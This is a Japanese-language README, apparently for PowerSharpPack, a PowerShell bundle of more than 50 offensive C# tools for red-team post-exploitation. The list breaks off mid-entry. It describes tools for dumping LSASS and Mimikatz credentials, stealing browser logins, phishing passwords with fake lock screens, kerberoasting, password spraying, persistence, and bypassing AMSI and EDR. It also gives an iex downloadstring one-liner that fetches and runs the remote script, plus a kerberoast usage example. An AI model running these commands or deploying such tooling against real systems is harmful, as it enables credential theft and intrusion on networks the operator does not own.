
50以上のC#製オフェンシブセキュリティツールをバンドルしたPowerShellラッパー。レッドチーム演習におけるポストエクスプロイテーション、特権昇格、資格情報のダンプ、ラテラルムーブメント、Active Directory偵察を目的としています。
多数の有用な攻撃的CSharpプロジェクトを、Powershellで簡単に使用できるようにラップしました。
なぜか? 私の個人的な見解では、攻撃的Powershellは、AMSI、スクリプトブロックログ、制限付き言語モード、その他の保護機能のために死んだわけではありません。これらのメカニズムはすべてバイパス可能です。最近の革新的な攻撃的セキュリティプロジェクトのほとんどはC#で書かれているため、それらをPowershellでも利用できるようにすることにしました。
では、基本的に何をしたのか?
[System.Reflection.Assembly]::Load($DecompressedDecodedBinary) を介してPowershellにロード。非常に簡単ですが、多くのリポジトリでは時間のかかるプロセスです。
どのツールが含まれていますか?
Internalmonologue
Internal Monologue Attack: LSASSに触れずにNTLMハッシュを取得
@Credit to: https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbeltは、攻撃的および防御的セキュリティの両方の観点から関連する、セキュリティ指向のホスト調査「安全チェック」を多数実行するC#プロジェクトです。
@Credit to: https://github.com/GhostPack/Seatbelt
SharpWeb
Google Chrome、Mozilla Firefox、Microsoft Internet Explorer/Edgeから保存されたブラウザ認証情報を取得する.NET 2.0 CLRプロジェクト。
@Credit to: https://github.com/djhohnstein/SharpWeb
UrbanBishop
UrbanBishop内にローカルのRWセクションを作成し、そのセクションをリモートプロセスにRXとしてマッピングします。シェルコードのロードが簡単になります。
@Credit to: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUpは、さまざまなPowerUp機能のC#移植版です。
@Credit to: https://github.com/GhostPack/SharpUp
Rubeus
Rubeusは、生のKerberos操作と悪用のためのC#ツールセットです。
@Credit to: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
SharPersist
C#で書かれたWindows永続化ツールキット。
@Credit to: https://github.com/fireeye/SharPersist
Sharpview
harmj0yのPowerViewのC#実装。
@Credit to: https://github.com/tevora-threat/SharpView
winPEAS
book.hacktricks.xyzのWindowsローカル権限昇格チェックリストを確認。
@Credit to: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Locklessはロックされたファイルのコピーを可能にします。
@Credit to: https://github.com/GhostPack/Lockless
SharpChromium
Chromiumデータ(Cookie、履歴、保存済みログインなど)を取得する.NET 4.0 CLRプロジェクト。
@Credit to: https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPIは、一部のMimikatz DPAPI機能のC#移植版です。
@Credit to: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
SharpShares
現在のドメイン内のすべてのネットワーク共有を列挙します。また、名前をIPアドレスに解決することもできます。
@Credit to: https://github.com/djhohnstein/SharpShares
SharpSniper
ユーザー名とログオンIPアドレスを介してActive Directory内の特定のユーザーを検索します。
@Credit to: https://github.com/HunnicCyber/SharpSniper
SharpSpray
LDAPを使用してドメインの全ユーザーに対してパスワードスプレー攻撃を実行するシンプルなコードセットで、Cobalt Strikeと互換性があります。
@Credit to: https://github.com/jnqpblc/SharpSpray
Watson
欠落しているKBを列挙し、有用な権限昇格の脆弱性に対するエクスプロイトを提案します。
@Credit to: https://github.com/rasta-mouse/Watson
Grouper2
ADグループポリシーの脆弱性を発見します。
@Credit to: https://github.com/l0ss/Grouper2
Tokenvator
Windowsトークンで権限を昇格させるツール。
@Credit to: https://github.com/0xbadjuju/Tokenvator
SauronEye
特定の単語を含む特定のファイル(パスワードを含むファイルなど)を検索するツール。
@Credit to: https://github.com/vivami/SauronEye
メインスクリプトを以下のようにロードします。
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
そして、ツールをスイッチパラメータとして選択します。例:
PowerSharpPack -seatbelt -Command "AMSIProviders"
バイナリに複数のパラメータを渡したい場合は、引用符を使用します。
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
何らかの理由ですべてのバイナリをロードしたくない場合は、PowerSharpBinariesフォルダにあるバイナリごとのPowershellスクリプトを使用できます。
スタンドアロンのPowershellスクリプトとしても利用可能なプロジェクト:
SharpCloud
AWS、Microsoft Azure、Google Computeに関連する資格情報ファイルの存在を確認するためのシンプルなC#。
@Credit to: https://github.com/chrismaddalena/SharpCloud
SharpSSDP
SSDPサービスディスカバリ。
@Credit to: https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT: データベース監査フレームワーク&ツールキット。
@Credit to: https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
Active Directory環境でリソースベースの制約付き委任攻撃パスを発見するツール。
@Credit to: https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
グループポリシーを通じてリモートアクセスポリシーを列挙するC#ツール。
@Credit to: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
リソースベースの制約付き委任(msDS-AllowedToActOnBehalfOfOtherIdentity)を介したコンピュータオブジェクトの乗っ取り。
@Credit to: https://github.com/pkb1s/SharpAllowedToAct
WireTap
ビデオ、オーディオ、キーボードハードウェアと対話する.NET 4.0プロジェクト。
@Credit to: https://github.com/djhohnstein/WireTap
SharpClipboard
C#クリップボードモニタ。
@Credit to: https://github.com/slyd0g/SharpClipboard
SharpPrinter
プリンタを発見し、脆弱性を確認。
@Credit to: https://github.com/rvrsh3ll/SharpPrinter
SharpHide
隠しレジストリキーを作成するツール。
@Credit to: https://github.com/outflanknl/SharpHide
SpoolSample
MS-RPRN RPCインターフェースを介してWindowsホストに他のマシンへの認証を強制するPoCツール。他のプロトコルでも可能です。
@Credit to: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuseはC#で書かれた.NETアプリケーションで、グループポリシーオブジェクト(GPO)に対するユーザーの編集権限を悪用して、そのGPOによって制御されるオブジェクトを侵害するために使用できます。
@Credit to: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDumpはPowerSploitのOut-Minidump.ps1機能のC#移植版です。
@Credit to: https://github.com/GhostPack/SharpDump
SharpHound3
BloodHoundプロジェクト用C#データコレクター、バージョン3。
@Credit to: https://github.com/BloodHoundAD/SharpHound3
PostDump
LSASSプロセスのミニダンプを、検出を回避するいくつかのテクニックを使用して実行する別のツール。
@Credit to: https://github.com/YOLOP0wn/POSTDump
SharpLocker
SharpLockerは、偽のWindowsロック画面を表示して現在のユーザーの資格情報を取得します。すべての出力はコンソールに送信され、Cobalt Strikeに最適です。
@Credit to: https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitnessは、Webサイトのスクリーンショットを撮り、サーバーヘッダー情報を提供し、可能であればデフォルトの資格情報を特定するように設計されています。
@Credit to: https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
パスワードを盗むための偽のWindowsログオン画面。
@Credit to: https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
PowerShell Runspaceポストエクスプロイテーションツールキット。
@Credit to: https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatzは、@gentilkiwiのMimikatzプロジェクトのわずかに変更されたバージョンと@subTeeの.NET PEローダーの組み合わせです。 私はこれを独自の難読化されたMimikatzバージョンで再度修正しました。
@Credit to: https://github.com/GhostPack/SafetyKatz
InveighZero
Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6スプーファー/中間者攻撃ツール。
@Credit to: https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploitはC#で書かれた.NETポストエクスプロイテーションライブラリです。
@Credit to: https://github.com/cobbr/SharpSploit
Snaffler
ペネトレーションテスターがおいしいキャンディを見つけるのを助けるツール(@l0ssと@Sh3r4作)。
@Credit to: https://github.com/SnaffCon/Snaffler
BadPotato
itm4nのPrintspooferをC#で実装。
@Credit to: https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
SafetyKatzのフォークで、最新のプリコンパイル済みMimikatzリリースをgentilkiwiのGitHubリポジトリから動的に取得し、ランタイムで署名をパッチし、SharpSploit DInvokeを使用してPEロードをメモリ上で実行します。
@Credit to: https://github.com/Flangvik/BetterSafetyKatz
SharpKatz
Mimikatzのsekurlsa::logonpasswords、sekurlsa::ekeys、lsadump::dcsyncコマンドのC#移植版。
@Credit to: https://github.com/b4rtik/SharpKatz
Gopher
低い実りの脆弱性を発見するC#ツール。
@Credit to: https://github.com/EncodeGroup/Gopher
SharpOxidResolver
AirBus Security / PingCastle の IOXIDResolver。
@Credit to: https://github.com/vletoux/pingcastle/
SharpBlock
EDRのアクティブなプロジェクションDLLをエントリポイント実行を阻止することでバイパスする方法。
@Credit to: https://github.com/CCob/SharpBlock
SharpLoginPrompt
このプログラムは、現在のユーザーのユーザー名とパスワードを収集するためのログインプロンプトを作成します。このプロジェクトにより、レッドチームはlsassに触れたり、システム上で管理者資格情報を持たずに現在のユーザーのユーザー名とパスワードをフィッシングできます。
@Credit to: https://github.com/shantanu561993/SharpLoginPrompt
ThunderFox
ThunderbirdとFirefoxからデータ(連絡先、メール、履歴、Cookie、資格情報)を取得します。
@Credit to: https://github.com/V1V1/SharpScribbles
StickyNotesExtract